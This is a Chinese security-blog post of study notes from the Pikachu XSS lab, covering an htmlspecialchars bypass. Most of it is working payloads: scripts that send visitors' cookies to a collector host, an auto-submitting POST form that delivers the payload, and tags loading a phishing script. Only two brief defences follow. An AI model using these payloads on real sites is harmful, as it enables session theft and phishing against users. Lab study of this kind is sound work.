XSS

  • A+
所属分类:安全博客

跨站脚本攻击

XSS绕过-关于htmlspecial()函数的绕过

Htmlspecialchars():是PHP中关于预定字符如(&,“,<>,)转义为实体HTML

Htmlspecialchars($string,ENT_COMPAT/ENT_QUOTES/ENT_NOQUOTES)

要过滤的字符 ,可用的引号类型,默认仅编码双引号/编码双引号和单引号/不编码任何引号

绕过构造闭合单引号

Xsscookic

1
<script>document.location='http://192.168.43.155/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

Post cookie

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<html>
<head>
<script>
window.onload = function() {
document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.43.155/pikachu-master/vul/xss/xsspost/xss_reflected_post.php">
<input id="xssr_in" type="text" name="message" value=
"<script>
document.location = 'http://192.168.43.155/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
</script>"
/>
<input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

<!--
*
<script>
document.write('<img src="http://127.0.0.1/antxss/xcookie/cookie.php?cookie='+document.cookie+'" width="0" height="0" border="0" />');
</script>
*/
/*
<script>
document.location = 'http://127.0.0.1/antxss/xcookie/cookie.php?cookie=' + document.cookie;
</script>
*/
-->

Xfish

1
2
<img src ="http://192.168.43.155/pkxss/xfish/fish.php" />
<script src ="http://192.168.43.155/pkxss/xfish/fish.php"></script>

防范

  1. 页面呈现转移
  2. 定制策略只允许用户加载某些资源(白名单)

注意

以上资料仅作信息防御技术使用,不得随意尝试,如有尝试,作者概不负责。

学习内容来源于pikachu。

FROM :https://ailumao.cn/ | Author:Ailumao

相关推荐: 密码保护:Nodejs安全从入门到入土

这是一篇受密码保护的文章,您需要提供访问密码: 密码: 相关推荐: Mybatis-plus框架常见SQL注入场景 一、关于Mybatis-plus   MyBatis-Plus (opens new window)(简称 MP)是一个 MyBatis (op…

  • 版权声明:本站收录文章,于2021年8月27日14:28:15,由 发表,共 1488 字。
  • 转载请注明:XSS | CN-SEC 中文网

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: